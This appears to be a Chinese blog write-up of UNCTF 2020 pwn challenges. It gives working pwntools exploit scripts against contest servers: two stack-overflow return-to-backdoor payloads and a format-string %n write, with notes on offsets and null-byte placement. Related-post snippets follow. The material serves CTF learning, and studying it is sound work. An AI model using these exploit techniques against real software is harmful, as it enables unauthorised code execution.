[UNCTF 2020]Pwn方向

最新推荐文章于 2024-02-05 18:05:34 发布
最新推荐文章于 2024-02-05 18:05:34 发布
阅读量377 收藏 2
点赞数
分类专栏: CTF pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nashi_Ko/article/details/109673004
版权
CTF 同时被 2 个专栏收录
13 篇文章 0 订阅
订阅专栏
pwn
7 篇文章 0 订阅
订阅专栏

[UNCTF 2020] PWN方向

YLBNB

在这里插入图片描述
直接在linux使用指令nc 45.158.33.12 8000
在这里插入图片描述

from pwn import *

io = remote('45.158.33.12',8000)

payload = 'chcp 65001'
io.sendline(payload)
print(io.recv())

运行脚本得到flag
在这里插入图片描述

fan

在这里插入图片描述
明显的栈溢出
在这里插入图片描述
binsh+system地址

#coding=utf-8
#!/usr/bin/env python
from pwn import *

io = remote('node2.hackingfor.fun',49408)

binsh = 0x400739
payload = 'A' * (0x30 + 8) + p64(binsh)
print(payload)
io.sendline(payload)

io.interactive()

在这里插入图片描述

do_you_like_me?

在这里插入图片描述
同上题,明显的栈溢出
在这里插入图片描述
binsh+system地址

#coding=utf-8
#!/usr/bin/env python
from pwn import *

io = remote('node2.hackingfor.fun',41043)

binsh = 0x4006D1 
payload = 'A' * (0x10 + 8) + p64(binsh)
print(payload)
io.sendline(payload)

io.interactive()

在这里插入图片描述

你真的会pwn嘛?(*格式化字符串漏洞)

0x00 逆向分析

在这里插入图片描述
在这里插入图片描述
只要dword_60107c不为0即可得到shell
运用格式化字符串漏洞%n即可修改dword_60107c

0x01 获取偏移量

在这里插入图片描述
可以看到输入的8个A在第十个变量,所以偏移量为10。

0x02 脚本

#coding=utf-8
#!/usr/bin/env python
from pwn import *
from LibcSearcher import *

io = remote('node2.hackingfor.fun',46560)
elf = ELF('./pwn22')

dword_60107C = 0x60107C
payload = '...%11$n' + p64(dword_60107C)
print(payload)
io.sendline(payload)
#偏移量10
io.interactive()

在这里插入图片描述
这个payload有三个注意点:
1.printf有\x00截断,即碰到\x00就会停止读入,所以如果把dword的地址放在%11$n之前,由于地址中存在\x00字符,所以会导致读取时碰到\x00而读不到%11$n就结束了。因此要把%11$n放在前面
2. %11$n只会把它之前输出的字符数量写到指定地址里,之后的不行。payload中的...%11$n 改为%11$n... 则写进去的是0,因为在它之前没有输出字符。上图中虽然输出了...|\x10但是真正写进去的只有...,也就是3。
3. 为了让printf认为dword的地址是要写进去的地址,一定要让它的地址刚好占一个机器字长。所以在这之前的 %11$n一定要用...补齐8个字符(当然不用.用别的字符也是可以的)

Nashi_Ko
关注
专栏目录
unctf2019 pwn部分题解
NoOneGroup
01-08 1568
unctf2019 pwn部分题解 新博客链接 babyheap easy,不讲了 #!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * local = 1 host = '127.0.0.1' port = 10000 context.log_level = 'debug' exe = '/tmp/tmp.spk5n...
2019.11.6 unctfpwn题——简单绕过pie
DSR446的博客
11-06 2889
这篇安全客关于pie和bapass绕过写的蛮好的! 看到函数最后返回到v1(),而且上一个函数的开辟的空间比后一个函数开辟的函数大,我们想到可以在前一个函数中提早将后门函数布置好,因为弹栈并不会是栈中的数据变化,除非往栈中写数据。 我们现在就通过gdb我们需要往栈的拿个位置写后门函数。 我们可以看见第一个数组的位置和后面 的v2()之间隔了0xc个字节。还有需要注意的是程序是将一个函数...
pwn方向杂记1.0
weixin_61283545的博客
11-13 270
ret2win 1.使用ida7.5打开软件后浏览main函数,发现缓冲区buf32,并且具有read函数,直接写脚本, payload中64位要多加8个字节覆盖,32位4个字节,并且python3中payload格式要在最前面加b,同时返回地址要写bin/sh的字符串位置。 ...
西安邮电大学第三届网络安全技能大赛---PWN方向WP
tbsqigongzi的博客
11-14 2668
第三届西邮校赛
PWN方向做题总结~
t235336456的博客
10-28 268
对比上面两行代码,可以发现call的下一条指令和backdoor只有最后两位不同(27,8D),所以我们在溢出之后将返回地址最后两位覆盖为\x27就可以返回到backdoor(注:返回地址是从低字节开始覆盖),因为高两位地址都是相同的,为12。可以看出是一道栈溢出题,read可以向buf读入0x1c也就是28个字节,而buf的栈空间只有0x14也就是20个字节,看样子似乎是溢出24字节到返回地址,然后覆盖返回地址为backdoor。事实并不是如此,buf的栈空间到底有多大?溢出了gets之后,查看栈。
CTF比赛 二进制 PWN方向入门:基础知识点精讲
最新发布
qq_62564422的博客
02-05 1878
称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态。这些参数仍会保存在调用函数(caller)的函数状态内,之后压入栈内的数据都会作为被调用函数(callee)的函数状态来保存。再将当前的ebp 寄存器的值(也就是调用函数的基地址)压入栈内,并将 ebp 寄存器的值更新为当前栈顶的地址。p2 1:59:00 开始。
UNCTF pwn
doudoudedi
10-30 774
简单的一道栈溢出题目先泄露libc然后使用gadgetgetshell Exp如下: #name:doudoudedi #coding:utf-8 from pwn import * from LibcSearcher import * def debug(): gdb.attach(p) #p=process('./pwn4') p=remote('101.71.29.5',10041) el...
UNCTF2020 misc crypto部分题目
wu_zh1_hui的博客
11-15 818
1.baba_is_you 下载下来是一张png图片 提示看十六进制码,用notepad++打开拉到最后发现网址 跳转过去评论区第一个评论就是flag:unctf{let’s_study_pwn} 2.阴阳人编码 下载下来是txt文件,打开发现阴阳怪气 看到三种标点! . ? 猜测是Ook密码,把中文替换成Ook,再把问号正过来,直接上在线解密网站得到 https://www.splitbrain.org/services/ook flag{9_zhe_Jiu_zhe_8_hui_8} 3.爷的
MidnightsunCTF Quals 2020 pwn
starssgo的博客
04-09 837
博客地址 外国人出的题往往比较有特色,相对我国大大小小的比赛尤其是一些堆题,往往都是一个固定的套路,越做最多写脚本的速度快了,其实并没有学到什么新东西。 pwn1,pwn2,pwn4都是简单的题,pwn3是arm栈溢出,pwn5是mips栈溢出,相对于我觉得pwn6比较有学习的地方。 目录pwn6思路及利用找漏洞思路修改dword_6D7330值伪造stout泄露地址测试poc将rop写入返回地址...
ACTF 2020 pwn
清霂的博客
04-23 262
目录fmt32shellcode 太菜了,只会写模板题 fmt32 格式化字符串模板题 #!/usr/bin/env python2 from pwn import * arch = "i386" filename = "fmt32" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) a1_addr=0x0804A070 a2_addr=0x0804A06
2020-11-15 UNCTF部分pwn的wp
eeeeeight的博客
11-15 317
第一题:     直接用pwn里的recv( )就行了 do you like me:     直接覆盖到ip返回地址就好了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('node2.hackingfor.fun',36806) #sh=process('./like') sh.recv() sh.sendline(p64(0)*3+p64(0
CTF-PWN学习-为缺少指导的同学而生
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
UNCTF pwn部分writeup
sea_time的博客
11-16 439
UNCTF pwn babyrop(栈溢出) 解题过程 首先覆盖变量,然后开启后门,然后通过后门函数来libc leak,然后再次回到后门函数,再次跳转到libc空间执行system("/bin/sh"),需要注意的是,对ret地址进行了check,所以先跳到ret上,然后通过check再到libc空间。 IDA打开 程序很简单 int __cdecl main() { char buf; /...
CTFpwn的入门指南
信息安全专题
10-21 7017
CTFpwn的入门指南 pwn简介: CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。   接下来介绍相关的学习思路(自己总结的,当作参考) 0x01 基础知识准备   pwn相对于web,更需要专业的技能和知识,最主要的是要学会如何分析程序,这就需要有足够的准备 c语言 汇编语言 python 操作系统 linux操作   C语言是最基础的,当下的比赛大部分的pwn题目使用
一道ctf pwn 的思路以及解法
tiaotiaolong99234的博客
06-23 1万+
一道ctf   pwn  的思路以及解法                                                                               -------TTL     前几天参加选拔,第一道pwn最后时候也没做出来,后来问了一下糖果,原来是脚本写错了。也怪前面的那到逆向re2。。就剩10分钟了,找到了pwn的漏洞,poc写错了。现在写
ctf比赛的方向及内容
weixin_74217229的博客
10-14 6117
CTF指的是网络安全技术人员之间进行技术竞技的一种比赛形式。在比赛中参赛队伍为获取flag。需要通过解决信息安全的技术问题来获取flag。其分为六个方向,分别是web安全,逆向工程(Reverse),Pwn:二进制漏洞利用,Crypto-密码攻击,Mobile-移动安全,Misc-安全杂项。 1 -Web-网络攻防学习Web安全中常见的漏洞,在考试中通过浏览器访问题目服务器上的网站,寻找网站漏洞(SQL注入等)。
UNCTF2022Pwn和Reverse的部分题解(其他方向的签到题也有)
weixin_73290593的博客
11-21 1282
unctf的re和pwn部分题解
[CTF PWN] 从0到0.00001 PWN入门超级详细
热门推荐
Csome
06-06 1万+
超级详细的CTFPwn方向的介绍,非常适合小白萌新,真的超级超级详细。Pwn的简介 Pwn的理论工具准备 初学 工具 贮备知识 入门 工具 贮备知识 Pwn的学习 初学-从Writeup中学习 入门-从比赛中学习 Pwn的环境准备 Windows 在Vscode中配置Pwn中环境 在Vscode中Pwn Pwntools的学习 简易快速入门 Pwn的做题流程 Pwn的简单例子 checksec 分析函数及漏洞 main函数 fun函数 编写exp 编写Writeup 小结
pwn】[UUCTF 2022 新生赛]easystack --pie爆破
question55的博客
11-12 454
查看程序保护发现开了pie:partial write(部分写入)就是一种利用PIE技术缺陷的bypass技术。由于内存的页载入机制,PIE的随机化只能影响到单个内存页。通常来说,一个内存页大小为0x1000,这就意味着不管地址怎么变,某条指令的后12位,3个十六进制数的地址是始终不变的。因此通过覆盖EIP的后8或16位 (按字节写入,每字节8位)就可以快速爆破或者直接劫持EIP简单来说就是后12位是不会被随机化的,接着看代码逻辑发现有个后门的函数可以getshell,但是问题是怎么溢出到这里,vuln函数
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值